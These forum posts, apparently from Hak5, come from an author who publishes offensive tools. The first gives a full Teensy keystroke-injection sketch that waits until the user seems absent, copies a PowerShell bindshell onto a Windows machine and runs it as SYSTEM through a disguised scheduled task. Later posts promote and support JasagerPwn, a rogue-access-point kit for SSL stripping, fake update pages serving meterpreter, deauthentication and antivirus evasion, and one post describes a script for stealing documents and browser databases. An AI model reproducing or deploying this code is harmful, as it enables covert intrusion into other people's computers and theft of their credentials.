leg3nd

Windows System Onboard Bindshell w/ Caps Lock Trap Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this script or its features. Download Teensy Sketch: http://info-s3curity.com/teensy/OnboardShell.tar.gz What is this? This is an example of an implementation with teensy with ideas given by ReL1k and irongeek which uses the teensy's onboard storage to store a very small and undetectable backdoor bindshell written purely in powershell. The code also uses some basic iterations and use of caps lock to check for user detection, it will turn on caps lock before every user detection check and if it stays on for 10 iterations (with delay intervals between checks), then it will assume the user is not at the computer considering most people do not type in all caps and tend to turn it off. How does it work? The caps lock check utilizes the usb_private library which contains a ledkeys() function, this function returns an integer based on the lock keys currently found turned on. By creating a statement which contains all possible combinations which include the interger for caps lock, which is 2, we can assume the light will be on. The following snipplet accomplishes that with ease.. if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7) Furthermore, by creating a couple nested statements with iterations we can use this check a little more throughly, by checking multiple times with time between the checks we can insure that nobody is using the keyboard to type unless they love screaming at people with caps lock. :D Now that we have established a basic way to determine if there is user activity on the computer, which is adjustable depending how sensitive you need it to be, we will create our attack vector.. Lets get a little evil. First we set the teensy in arduino to "Keyboard + Disk(Internal)" mode, this will allow us to use the very small amount of flash memory to store our onboard bindshell which will be copied over to compromise the system. This bindshell is a very simple powershell script which can be run without any AV issues through Windows powershell, we will also utilize Windows task scheduler to both hide the window and run the script with system privileges. This can also be setup by editing the code to run at a given time, but I just have it setup to run the one time when the user is not detected. Once the victim is compromised, we simply netcat into the bindshell on port 12345 and do whatever needs to get done. EG, nc 192.168.1.100 12345 Requirements A stock teensy development board and Arduino development environment, no soldering or modifications required. Windows 7 victim and user account must have Administrator privileges Note: Download the full sketch form link above for use, also contains bindshell and setup for internal disk usage. The code... /* leg3nd's Windows powershell bindshell w/ system Based on PhukdLib by irongeek, powershell bindshell by Rel1k Detects user to implement attack based on capslock state -MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK */ #include "usb_private.h" #define send_enter() send_keys(KEY_ENTER, 0); #define send_caps() send_keys(KEY_CAPS_LOCK, 0); #define send_windows() send_keys(0, 128); #define send_alt_y() send_keys(KEY_Y, MODIFIERKEY_ALT); #define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI); int attacked = 0; void setup(){ pinMode(11, OUTPUT); delay(5000); startDelay(30, 25); //startup blink } void loop(){ delay(9000); // Time between attack checks if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap int userState = 0; for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks delay(3000); //Delay between caps lock check iterations if (IsCapsOn()){ delay(3000); //Delay after caps lock is found to be on } else { userState = userState + 1; } } if (userState>0){ delay(300000); //Time to wait if user is detected, 300K = 5min } else { AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned"); delay(200); AdminCmd("schtasks /create /tn sysupdate /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59"); delay(200); AdminCmd("schtasks /run /tn sysupdate"); delay(999999999); //Just chill, payload already executed (max 11.5 days) } } //Execute command as administrator void AdminCmd(char *SomeCommand) { send_windows(); delay(1500); //Delay for start menu to come up Keyboard.print(SomeCommand); Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.send_now(); send_enter(); delay(1000); //Delay for UAC prompt send_alt_y(); } //LED key checking for caps lock int ledkeys(void){ return int(keyboard_leds); } //Return the state of caps lock, regardless of other lights. boolean IsCapsOn(){ if (ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7){ return true; } else { return false; } } //Key & Utility functions void startDelay(int count, int dlay){ //debug testing light for (int i=0; i<count; i++){ digitalWrite(11,HIGH); delay(dlay); digitalWrite(11,LOW); delay(100); } } void release_keys(){ Keyboard.set_key1(0); Keyboard.set_modifier(0); Keyboard.send_now(); delay(100); } void send_keys(int key, int modifier){ if(modifier) Keyboard.set_modifier(modifier); Keyboard.set_key1(key); Keyboard.send_now(); delay(100); release_keys(); } Enjoy responsibly! B)

The majority of the script is complete and will remain the same, I only implement changes when I see something I really like, and that is all dynamic when you update it. As long as you just setup the variables you'll be set. In your case, everything you have said for the variables appears correct. WIFACE = "wlan1", IFACE = "wlan0", FONIFACE = "eth0", WiFiMode = "1" (So you do not deauth your internal wireless card). Other then that just make sure the dhcp configuration and the pineapple are setup with the correct subnets and its good to go.

No I don't think port forwarding would be necessary for any of it. It sounds to me like some kind of issue with that specific wireless access point. Maybe something like wireless isolation is causing a problem, or some kind of DNS filter? I have never heard of this problem, so perhaps someone else can shed some light on the issue and I can try to make a workaround. I would pop into the router and look through the settings, It seems like something in there is causing the problem if you can use other access points or your mobile phone for internet.

You have given me multiple subnets which don't seem to make sense. The pineapple network as you have explained should be on the 192.168.10.0 255.255.255.0 subnet, with an IP of 192.168.10.1, the attacker machine (fonIP) should be set to 192.168.10.2. This is all assuming the configuration you had posted yesterday. I would try setting it up to use this subnet and see if it works. The script should run fine with the default settings and subnet mentioned above, besides "IFACE" which you need to set to the wireless card you are using. The subnet for the internet connectivity, such as the wireless router your trying to tunnel the connection through is irrelevant, the subnet should not matter at all as its tunneled from the interface and not the IPs. The pineapple should not have the ability to ping when you SSH into it, because it does not have a DNS server assigned to it. The internet will only work for people who are assigned an IP address from your DHCP server running on the attacking machine. I will try to add a function to configure the pineapple and script when I get some time.

Please use code tags when posting large amounts of information. The configuration looks generally correct, The pineapple appears to be configured correctly and the script settings appear to be okay as well, although you did not give me a description of the topology as requested so its pretty hard to know. Try using a different wireless card as the "IFACE" variable, perhaps using it for attacks with monitor mode is causing problems. You may want to play around with it and try and get some more information on what exactly the issue may be. For example try to use one of the attacks and see if they even work, as they do not require any internet connection at all to function. Furthermore, you should respond with some basic troubleshooting information you have gathered from testing and tweaking your setup such as: Test connectivity to pineapple: ping 192.168.10.1 Test connectivity to DNS server: ping 4.2.2.2 Test DNS functionality: ping google.com

When the script is running it should be set to 4.2.2.2 but if you need to try it manually its simply: echo "nameserver 4.2.2.2" > /etc/resolv.conf

Alfa is not your only choice either, with the release of backtrack 5 many other wifi cards are now supported by default. Including the majority of broadcom cards and netgear wg111's. Check the BackTrack 5 "Hardware compatibility" forum for more information: http://www.backtrack-linux.org/forums/backtrack-5-hardware-compatibility-list/ Another place to look for compatible cards of course would be: http://www.aircrack-ng.org/doku.php?id=compatible_cards

You need to be much more specific with your issues for me to troubleshoot it. At which point are the requests failing? For example, in the java attack, the fake update attack, or in normal internet connectivity. Please use pastebin or use code tags and post the top of the script (the confiruation) as well as a description of your network topology your trying to use with it. General DNS troubleshooting... While the script is running run "cat /etc/resolv.conf" and insure it outputs "nameserver 4.2.2.2". Ensure your have dnsmasq disabled on the fon, ssh into it and run: /etc/init.d/dnsmasq stop && /etc/init.d/dnsmasq disable Ensure you have the interfaces in the script configured correctly to forward your internet connection. WIFACE, should be the wireless card used for attacking and de-authorization, such as an alfa. FONIFACE, should be the ethernet interface that is connected to the pineapple/fon. IFACE, should be the interface that you are sharing the connection from which can be from a phone or a wireless AP.

That is the IP address of your attacking computer which is facing the pineapple via ethernet. It should also be the same IP represented in the $fonIP variable. For the setup it appears your trying to use the topology would be something like: Pineapple: No DHCP(dnsmasq) running, 192.168.0.1 fonIP Variable (Attacker computer): 192.168.0.2 I will update the script to use that fonIP variable in that configuration instead and update the comments to be a little easier to understand.

You will need to configure both the pineapple and the variables/settings in the top of the script to reflect your network settings. The default configuration for jasagerPwn uses the 192.168.10.0/24 subnet.

Yeah sorry I think it changed since bt4 and I did not notice. The correct method should be something along these lines Twisted web (Iv only gotten this to work on 32 bit): apt-get update && apt-get -y install python-twisted-bin python-twisted-core python-twisted-web python-twisted-web2 Install SET and airdrop-ng(I think airdrop-ng is scripted to be installed regardless.): cd /pentest/exploits/set/ && chmod +x setup.py && python setup.py && cd /pentest/wireless/aircrack-ng/scripts/airdrop-ng/ && chmod +x install.py && python install.py I updated the wiki and installHowTo files. They may already be installed in BT5, at least some of them, but I'm not sure. The script should install most of it during the dependency checks as well, still probably better off being safe and just installing it manually because I may have forgotten something.

Ah okay that makes sense. I was never able to figure out what was causing it, but it was pretty blatant that a real router was needed over the soft AP. Thanks for the clarification. There is a "Wiki/Installation" page on the googlecode website that explains the setup, as well as a text file with similar information that comes with the script. You just have to setup your subnets and disable dnsmaq(DHCP server) on your FON, the script handles the rest pretty much.

Actually yes, The original concept of this script was based on airbase-ng, But I converted it over to Jasager because airbase-ng uses different methodology to implement jasager, allowing only a couple clients at a time with glitchy and unreliable results. After getting a pineapple I experienced MUCH more reliable results, as well as the ability to maintain 20+ clients at once. Airebase-ng can get the job done for research, but I recommend a real Jasager router for professional work and audits. EDIT: Edited for accuracy from digininja's information.

Yeah my god.. All those nested iterations and statements.. I'm not sure if it could be any more un-pythonic lol And I am honestly no python master, I consider myself a beginner at best really.. If you wanna check out some real pro's hop into #python. Some of the guys in there really know there stuff (although some don't always explain it in the easiest manner in my experience).

Ah, kind of a weird issue. But I have seen that 00:00:00:00:00 pop up with airdrop and airodump a few times as well, never really figured out why. But hey whatever gets the job done! Hope it helped, Good luck.

I'm rocking BT5-Gnome-32 on my Macbook Pro, as stated here, http://www.backtrack-linux.org/forums/backtrack-5-hardware-compatibility-list/41189-macbook-pro-bcm4328-r5-b-g-n-%5Bworking%5D.html And BT5-Gnome-64 on my main tower. I already have a custom ubuntu image on one of my droid's, But will probably switch to the ARM image once I get some time. As for why Gnome>KDE, Personal preference I sippose, although KDE4 does look pretty clean. 10/10 to the BackTrack team. Great job.

Okay I got a couple ideas for yea.. If you wanna keep it sexy and pythonic, how about some RegEx B) import commands, re def getmac(iface): ifconfig = commands.getoutput("ifconfig " + iface) mac = re.search('\w\w:\w\w:.+\n', ifconfig) if mac is None: parsedMac = 'Mac not found' else: parsedMac = mac.group() print parsedMac #Or use return here. getmac('eth0') Considering your rockin' ifconfig already, could also get kinda bourne with it (More my style :D ) import commands def getmac(iface): ifconfig = commands.getoutput("ifconfig " + iface + "| grep HWaddr | awk '{ print $5 }'") if len(ifconfig) != 17: mac = 'Mac not found' else: mac = ifconfig print mac #Or use return here. getmac('eth0') Hope this helps you out a bit.. If you wanna dive into the 1337 world of python, I recommend these awsome videos from google to start out. http://www.youtube.com/results?search_query=google+python+class&aq=f Enjoy!

Awesome! I am also pleased to announce that I have made some major changes to the FakeUpdate attack vector, now *nix and OSX victims will receive a Java Applet much like the SET vector which will allow for a much more effective vector in terms of Mac / Linux. I will be releasing this later on tonight or tomorrow most likely along with some other minor changes.

Bump. :(

It is totally possible. You guys are simply not thinking "outside the box". Keep in mind your NOT limited to arduino here, you have full keyboard and mouse functionality, giving you command execution, therefore also giving you access to native languages. EG: Powershell, Batch, and VBS. As for "It cannot read data". Also not thinking outsite the box, windows has native FTP and TFTP. Networking handles the data. I have an entire file collection script which I will consider throwing on here later on to show you guys how insanely effective it is. As of now (only had my teensy for a week), it steals tons of recent documents, firefox SQLite databases, printer spool documents, and tons of other potentially "interesting" information. Although it would be very simple to add in additional functionality to it.

Thanks for the quick reply's and support, its appreciated. I have the video uploaded and made fixed a few bugs, I will be updating the main post with the correct information shortly. UPDATE: I have had a few major bugs personally reported to me regarding the usage of this in BackTrack 5 and possibly other distros. Make sure to update your script before trying it out via googlecode or the -U/-u switches. Good luck to all, please report all other bugs to me.

JasagerPwn Version 1.4 Considering the MK3 has been released and the thread has been unpinned, I will not longer be checking this or providing support but will continue to keep the googlecode page updated. Disclaimer: This script is intended for LEGAL purposes ONLY. By downloading the following material you agree that the intended use of the previously mentioned is for LEGAL and NON-MALICIOUS purposes ONLY. This means while gaining client side exploits, you have the correct documentation and permissions to do so in accordance with all US and International laws and regulations. Nor I nor any associates at Hak5 condone misuse of this script or its features. Notes from developer: Please leave your feedback regarding your experience while using this script (Good or bad), ideas for future development, improvements, and bugs. Feedback is what will keep me developing and spending my free time implementing new attacks for public use. The video is older and gives a basic idea of the script, but things such as the FakeUpdate attack vector are now OS agnostic, as well many others improvements. The googlecode page has been changed, Insure you have the most current version from the links below or else you will get errors and not receive updates. Thanks. Script Download: JasagerPwn @ Infos3c (Right Click > Save As) Google Code: http://code.google.com/p/jasagerpwn/ Video Download: http://blip.tv/file/get/Leg3ndary-JasagerPwnScript532.flv (Right Click > Save As) Video Online: http://blip.tv/file/5143877 What does this do? This is a bash script designed for BackTrack 4/5 or other Ubuntu based distributions. It utilizes the powerful Jasager firmware on a rogue access point, Allowing the attacker to seamlessly implement different attacks based on there current situation. These attacks use popular frameworks such as Metasploit, Social Engineering Toolkit, and SSL Strip. The intention of this script is to allow seamless utilization of all the attacks with ease, allowing your client-side attacks success rate and speed of the setups to sky rocket. Included Features: SSL Strip: The powerful python implementation by none other then Moxie Marlinspike. This attack will strip out all SSL encryption from website such as Gmail, Paypal, Chase, and similar "secured" websites. While you are in the middle with your access point, you can see the passwords pass through your system in cleartext allowing you to gain full access to various accounts. FakeUpdate: This forces your WLAN clients via IPtables to a custom website setup I created using a main index.php which redirects the user based on the client OS detected. For example if they are on Microsoft Windows, they will be redirected to a Microsoft Security Update page with a download link to a meterpreter reverse_tcp payload. As of rev7, This has support for OSX/Linux via Java Applets, Much more viable now! BrowserPwn: This forces your WLAN clients via IPtables to a web server running the Metasploit BrowserAutopwn auxiliary module. The modules contains various browser based exploits which will be ran against your clients in hope for a meterpreter or shell payload to be ran. Works relatively well depending on the patch levels of your clients and the current exploits available at the time, ensure to use msfupdate or -U before. JavaPwn: This is an attack vector from the Social Engineering Toolkit, by ReL1k, It forces your WLAN clients via IPtables to either a Google or Java Required web template which will pop up a "Secure signed java applet". This applet will contain a corresponding payload for the client and is highly effective as most users do not realize the potential risk of java applets. Probably my personal favorite with the highest success rate. - This now utilizes a new powershell meterpreter injection technique straight into memory, bypassing all windows anti-viruses on Vista and Windows 7. As of v1.3 r53. DeAuthorization: This section contains multiple ways to deauthorize clients on other access points in hope that they will connect to yours. A kind of "reverse war driving" (-Darren Kitchen). In my opinion this should always be running when your out in the wild, it will pull in clients and up your success rate substantially. Airdrop-ng: A rule-based deauth attack which is by far the most effective method of collecting clients. You can add custom ruled to the configuraion via the "script/network" settings section as needed. By default you should have yourself on here if you setup the variables correctly. Mass DeAuth: A basic implementation of 'airplay-ng -0 -D' built into a bash script I wrote. Somewhat effective if you cannot use airdrop-ng. Single DeAuth: Pretty self descriptive, allows you to check out the clients and set up attacks to grab them specifically. Useful in some situations. [*]Script/Network Settings: Some basic settings for the script and your network which can be changed "on the fly". Mostly stuff I found while useful while testing the script in different situations. These include editing your airdrop-ng deauth configuration, changing your gateway interface, and refreshing your internet connection (DHCP/DNS). Compatibility: This was created with intentions for Alfa AWUS036H, Backtrack 4/5, and a Jasager powered router. Although it will likely work with other wireless cards and other Ubuntu based distributions if setup correctly. Known Issues: Extensive testing in lab environments can cause both the attacking and victim machine to run into connectivity issues. Reboots during testing can solve many issues on both sides. DHCP Issues with the Mark 3 - Currently looking for a fix. ChangeLog: Revision 3: Reset revision numbers with new googlecode page. Revision 5: Fixed update functions for new googlecode links. Revision 6: Added MUCH more stable dependency installations. Revision 7: Redesigned FakeUpdate with java applet for OSX/Linux. Revision 8: Added "Java Repeater" functionality to FakeUpdate OSX/Linux. Revision 19: Lots of minor stability changes. Updates to go with new versions of SET. Revision 26: Removed SET all together. Java attacks are now implemented by jasagerPwn. Revision 30: Removed DNSspoof and used metasploit fakeDNS instead for stability. Other major changes. Revision 51: Added ability to set gateway static, other basic changes. Revision 53: Added new powershell payload deployment, No more anti-virus issues.. EVER! Revision 63: Added obfuscation of normal windows payloads. Streamlined code and added NGREP script.